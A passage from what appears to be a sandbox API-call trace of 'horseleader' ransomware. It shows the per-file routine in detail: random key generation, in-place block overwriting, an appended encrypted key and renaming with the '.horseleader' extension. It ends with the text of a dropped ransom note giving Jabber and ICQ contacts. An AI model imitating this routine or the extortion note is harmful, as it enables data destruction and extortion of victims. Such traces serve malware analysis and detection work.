Shared\\THEMES14\\CAPSULES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.358] GetProcessHeap () returned 0x780000 [0246.358] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*") returned 70 [0246.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.358] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\.") returned 70 [0246.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.358] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.358] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\..") returned 71 [0246.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.358] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb88f00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x603362b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xecb88f00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe1ba, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CAPSULES.ELM", cAlternateFileName="")) returned 1 [0246.358] lstrcmpiW (lpString1="CAPSULES.ELM", lpString2="Windows") returned -1 [0246.359] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0246.359] StrStrIW (lpFirst="CAPSULES.ELM", lpSrch=".horseleader") returned 0x0 [0246.359] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.359] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="_uninstalling_.png") returned 1 [0246.359] lstrlenW (lpString=".testttjffg") returned 11 [0246.359] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM", lpSrch=".testttjffg") returned 0x0 [0246.359] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.359] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.361] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0246.361] StrStrW (lpFirst="CAPSULES.ELM", lpSrch=".txt") returned 0x0 [0246.361] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=57786) returned 1 [0246.361] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.365] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.365] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.365] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.366] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x41ba, lpOverlapped=0x0) returned 1 [0246.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbe46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x41ba, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x41ba, lpOverlapped=0x0) returned 1 [0246.367] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.367] CloseHandle (hObject=0x1a4) returned 1 [0246.367] GetProcessHeap () returned 0x780000 [0246.367] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.368] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM.horseleader") returned 93 [0246.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm.horseleader")) returned 1 [0246.368] GetProcessHeap () returned 0x780000 [0246.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.369] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf86a7300, ftCreationTime.dwHighDateTime=0x1c47827, ftLastAccessTime.dwLowDateTime=0x51c2ab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf86a7300, ftLastWriteTime.dwHighDateTime=0x1c47827, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CAPSULES.INF", cAlternateFileName="")) returned 1 [0246.369] lstrcmpiW (lpString1="CAPSULES.INF", lpString2="Windows") returned -1 [0246.369] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0246.369] StrStrIW (lpFirst="CAPSULES.INF", lpSrch=".horseleader") returned 0x0 [0246.369] lstrcmpW (lpString1="CAPSULES.INF", lpString2="#Decrypt#.txt") returned 1 [0246.369] lstrcmpW (lpString1="CAPSULES.INF", lpString2="_uninstalling_.png") returned 1 [0246.369] lstrlenW (lpString=".testttjffg") returned 11 [0246.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF", lpSrch=".testttjffg") returned 0x0 [0246.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.370] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0246.370] StrStrW (lpFirst="CAPSULES.INF", lpSrch=".txt") returned 0x0 [0246.370] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=501) returned 1 [0246.370] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f5, lpOverlapped=0x0) returned 1 [0246.371] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.371] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f5, lpOverlapped=0x0) returned 1 [0246.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.372] CloseHandle (hObject=0x1a4) returned 1 [0246.372] GetProcessHeap () returned 0x780000 [0246.372] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.372] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF.horseleader") returned 93 [0246.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf.horseleader")) returned 1 [0246.376] GetProcessHeap () returned 0x780000 [0246.376] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.376] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7fc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.376] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.376] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0246.376] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.377] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.377] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.377] lstrlenW (lpString=".testttjffg") returned 11 [0246.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0246.379] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.379] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2044) returned 1 [0246.379] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x7fc, lpOverlapped=0x0) returned 1 [0246.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff804, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x7fc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x7fc, lpOverlapped=0x0) returned 1 [0246.382] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.382] CloseHandle (hObject=0x1a4) returned 1 [0246.382] GetProcessHeap () returned 0x780000 [0246.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.382] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.horseleader") returned 92 [0246.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.horseleader")) returned 1 [0246.383] GetProcessHeap () returned 0x780000 [0246.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.383] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x74e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.384] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.384] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0246.384] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.384] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.384] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.384] lstrlenW (lpString=".testttjffg") returned 11 [0246.384] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.384] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.384] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.384] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0246.385] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.385] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29925) returned 1 [0246.385] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.389] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24e5, lpOverlapped=0x0) returned 1 [0246.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdb1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24e5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24e5, lpOverlapped=0x0) returned 1 [0246.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.390] CloseHandle (hObject=0x1a4) returned 1 [0246.391] GetProcessHeap () returned 0x780000 [0246.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.391] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.horseleader") returned 93 [0246.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.horseleader")) returned 1 [0246.392] GetProcessHeap () returned 0x780000 [0246.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.392] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x74e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.392] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.392] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\#Decrypt#.txt") returned 82 [0246.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.393] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to 